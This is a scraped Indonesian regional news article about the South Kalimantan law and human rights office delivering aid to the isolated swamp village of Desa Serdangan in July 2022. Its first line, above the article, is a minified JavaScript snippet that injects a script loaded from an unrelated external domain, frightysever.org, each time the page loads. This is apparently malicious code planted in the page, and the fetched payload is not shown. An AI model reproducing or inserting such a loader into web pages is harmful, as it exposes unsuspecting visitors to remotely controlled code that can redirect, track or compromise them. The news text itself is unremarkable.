(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

“Touring Kumham Peduli Desa Terpencil” Kemenkumham Kalsel ke Desa Serdangan Kusan Tengah


KANALKALIMANTAN.COM, BATULICIN – Menyambut Hari Dharma Karya Dhika (HDKD) ke-77, Kepala Kantor Wilayah Kemenkumham Kalimantan Selatan bersama seluruh Kepala Unit Pelaksana Teknis se Kalsel gelar bakti sosial di Desa Serdangan, Kecamatan Kusan Tengah, Kabupaten Tanah Bumbu, pada Sabtu (24/7/2022).

Kurang lebih 40 buah motor trail dan mobil off road berangkat dari Lembaga Pemasyarakatan Kelas IIB Batulicin untuk menuju Desa Serdangan Kecamatan Kusan Tengah, Kabupaten Tanah Bumbu mengantarkan bantuan sosial untuk masyarakat dan renovasi masjid Raudatul Jannah Desa Serdangan.

Medan berat berlumpur dengan penuh tantangan harus dilewati untuk sampai pada Desa Serdangan yang berada di ujung Kecamatan Kusan Tengah.

Baca juga: Dua Orang Dibacok di SPBU Simpang 4 Banjarbaru, Pelaku Masih Dalam Pengejaran  

 

 

Tak hanya itu, rombongan Kanwil Kemenkumham RI Kalimantan Selatan juga memberikan perhatian dan bantuan kepada anak didik dan tenaga pengajar SD yang ada di Desa Serdangan berupa seperangkat alat sekolah.

Kedatangan rombongan yang membawa bantuan sosial tersebut pun disambut baik oleh Plt Kepala Desa Serdangan bersama masyarakat.

Kepala Kantor Wilayah Kemenkumham Kalimantan Selatan bersama seluruh Kepala Unit Pelaksana Teknis se Kalsel gelar bakti sosial di Desa Serdangan Kecamatan Kusan Tengah, Kabupaten Tanah Bumbu, pada Sabtu (24/7/2022). foto: Kemenkumham Kalsel

Kepala Kantor Wilayah Kemenkumham Kalsel Lilik Sujandi didampingi Kalapas Kelas II A Batulicin Bambang Hari Widodo bersama Kepala Kantor Imigrasi Kelas II B TPI Batulicin Gusti M Iberahim mengatakan bahwa kegiatan bansos ini, guna menyambut perayaan HUT Kemenkum HAM RI ke-77 atau Hari Dharma Karya Dika.

“Alhamdulillah hari ini Kantor Wilayah Hukum dan HAM Kalimantan Selatan bersama Seluruh Kepala Unit Pelaksana Teknis se Kalimantan Selatan bisa menggelar bakti sosial kepada masyarakat di Kabupaten Tanah Bumbu melalui Touring Kumham Peduli Desa Terpencil,” katanya.

“Kenapa memilih Desa Serdangan karena desa itu terpencil dan terisolir dikarenakan susahnya medan, akses untuk menuju desa tersebut berada di pertengahan rawa, yang mana masyarakat desa tersebut mata pencahariannya merupakan nelayan ikan air tawar,” jelasnya.

Kepala Kantor Wilayah Kemenkumham Kalimantan Selatan bersama seluruh Kepala Unit Pelaksana Teknis se Kalsel gelar bakti sosial di Desa Serdangan Kecamatan Kusan Tengah, Kabupaten Tanah Bumbu, pada Sabtu (24/7/2022). foto: Kemenkumham Kalsel

Desa Serdangan selalu menjadi langganan banjir kiriman setiap tahunnya dikarenakan berada di kawasan rawa.

Kegiatan ini bagian dari agenda memperingati HDKD ke-77, dengan harapan dapat lebih mengenalkan peran dan fungsi Kemenkumham kepada masyarakat, serta juga memberikan pendampingan informasi yang mesti diketahui oleh masyarakat.

Baca juga: Pria Asal Kapuas Sebar Video Mesum karena Tak Terima Mantan Punya Kekasih Baru

Awaludin salah satu warga Desa Serdangan mengaku sangat senang dengan kedatangan rombongan Kemenkumham Kalsel yang membawa bantuan sosial untuk masyarakat, sekolah, masjid, dan Poskesdes Desa Serdangan.

Desa ini susah ditempuh menggunakan motor dan roda empat dikarenakan alat transportasi menuju desa ini masyarakat setempat menggunakaan perahu ketinting.

“Sangat jarang desa kami ini mendapat kunjungan terhormat ini, apalagi orang dari provinsi yang telah sudi berkunjung pada desa kami,” ujarnya.

“Kami selaku masyarakat Desa Serdangan sangat mengucapkan ribuan terimakasih atas bantuan dan kepedulian dari Kemenkumham Kalsel kepada desa kami yang terpencil ini,” ucapnya.

“Kami berharap kegiatan ini terus dilaksanakan, tidak hanya pada desa kami saja, tapi desa-desa terpencil lainnya yang ada di Kalimantan Selatan,” tandasnya.(Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Risa

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

13 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

13 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

14 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

14 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

14 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

14 jam ago

This website uses cookies.